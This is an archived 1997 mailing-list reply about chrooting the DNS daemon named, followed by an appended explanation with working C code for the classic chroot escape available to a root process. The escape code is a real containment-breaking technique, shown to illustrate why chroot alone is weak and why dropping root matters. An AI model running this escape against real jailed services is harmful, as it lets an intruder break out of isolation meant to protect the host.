Firewall Wizards mailing list archives
Re: DNS on the Firewall - security problem
From: Adam Shostack <adam () homeport org>
Date: Fri, 10 Oct 1997 07:51:09 -0400 (EDT)
Marc Heuse wrote:
| I found so far two possibilities to solve this problem ...
| The first is to chroot named. pointer : www.homeport.org/~adam/dns.html
| The second is to just forward the dns resolving to a host in the dmz plus
| running also the primary external dns there.
|
| Do you see any problems with these suggestions?
| And another question, are there any secure/minimal dns-servers out there?
| pointers?
Since I wrote the chrooting a named doc, I'll remind everyone that a
root process chrooted is not all that great an improvement in the
theoretical analysis. It's a nice improvement in practicality, since
there is no egg* to overflow and break a chroot. Thus, if you don't
put CHROOT/bin/sh in place, the standard attacks will fail, but a
smart attacker can still get in. In practicality, there are few smart
attackers.
Adam
*An egg is the core of code that a buffer overflow includes to do the
real work. It's the thing that hatches and gets you root. See some
early l0pht advisory. And make that "no egg generally available."
--
"It is seldom that liberty of any kind is lost all at once."
-Hume
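The two halves of Adam's point, as an added example that is not code from the list or from his chroot document: the "standard" egg just execve()s /bin/sh, so a jail built without CHROOT/bin/sh defeats it; a "smart attacker" who is already root inside the jail does not need a shell there at all, because a root process can leave a chroot with the textbook mkdir/chroot/chdir("..")/chroot(".") sequence. The escape below assumes Linux, a writable /tmp (or current directory) for the scratch directory, and a process holding CAP_SYS_CHROOT; as an unprivileged user the chroot() call fails with EPERM, which is exactly why the theoretical weakness only applies to a root daemon.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The "standard attack": the egg only execve()s a shell at a fixed path.
 * If that path does not exist under the process's current root (no
 * CHROOT/bin/sh), the execve fails and the attack goes nowhere.
 * This helper only checks for the binary; it does not run anything. */
int standard_egg_would_work(const char *shell)
{
    return access(shell, X_OK) == 0;
}

/* What a root process can do instead (classic chroot escape):
 *   1. create a scratch directory inside the jail,
 *   2. chroot() into it WITHOUT chdir()ing into it, so the working
 *      directory is now outside the process's root,
 *   3. climb with chdir("..") until "." and ".." are the same inode,
 *      i.e. the real filesystem root,
 *   4. chroot(".") to make that the new root.
 * Returns 0 on success, -errno on failure (-EPERM without CAP_SYS_CHROOT). */
int escape_chroot(void)
{
    char scratch[] = "/tmp/escape.XXXXXX";      /* assumed writable */
    if (mkdtemp(scratch) == NULL) {
        strcpy(scratch, "./escape.XXXXXX");     /* fall back to cwd */
        if (mkdtemp(scratch) == NULL)
            return -errno;
    }

    if (chroot(scratch) != 0) {                 /* step 2: no chdir() first */
        int e = errno;
        rmdir(scratch);
        return -e;
    }

    /* step 3: cwd was left where it was, outside the new root, so ".."
     * keeps resolving upward until it reaches the real "/". */
    for (int i = 0; i < 256; i++) {
        struct stat here, up;
        if (stat(".", &here) != 0 || stat("..", &up) != 0)
            return -errno;
        if (here.st_ino == up.st_ino && here.st_dev == up.st_dev)
            break;                              /* "/.." == "/" */
        if (chdir("..") != 0)
            return -errno;
    }

    if (chroot(".") != 0)                       /* step 4 */
        return -errno;

    /* Only succeeds when we were not jailed to begin with; inside a real
     * jail the scratch path is no longer valid from the new root, so the
     * directory is simply left behind. */
    rmdir(scratch);
    return 0;
}

int main(void)
{
    printf("egg's /bin/sh reachable under current root: %s\n",
           standard_egg_would_work("/bin/sh") ? "yes" : "no");
    int r = escape_chroot();
    if (r == 0)
        printf("chroot escape succeeded (process root is now the real /)\n");
    else
        printf("chroot escape failed: %s\n", strerror(-r));
    return 0;
}
```

Run it as an unprivileged user and the escape stops at the first chroot() with EPERM; run it as root inside a jail that lacks /bin/sh and the egg check says "no" while the escape still succeeds, which is the gap between the practical and the theoretical improvement. Dropping root before named starts serving, not chroot alone, is what closes it.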
Current thread:
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 10)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Darren Reed (Oct 12)
- Re: DNS on the Firewall - security problem Perry E. Metzger (Oct 12)
- Re: DNS on the Firewall - security problem Aleph One (Oct 12)
- Re: DNS on the Firewall - security problem Gaddy Gumbao (Oct 13)
- Re: DNS on the Firewall - security problem Bernd Eckenfels (Oct 19)
- Re: DNS on the Firewall - security problem Adam Shostack (Oct 12)
- Re: DNS on the Firewall - security problem Alfred Huger (Oct 10)
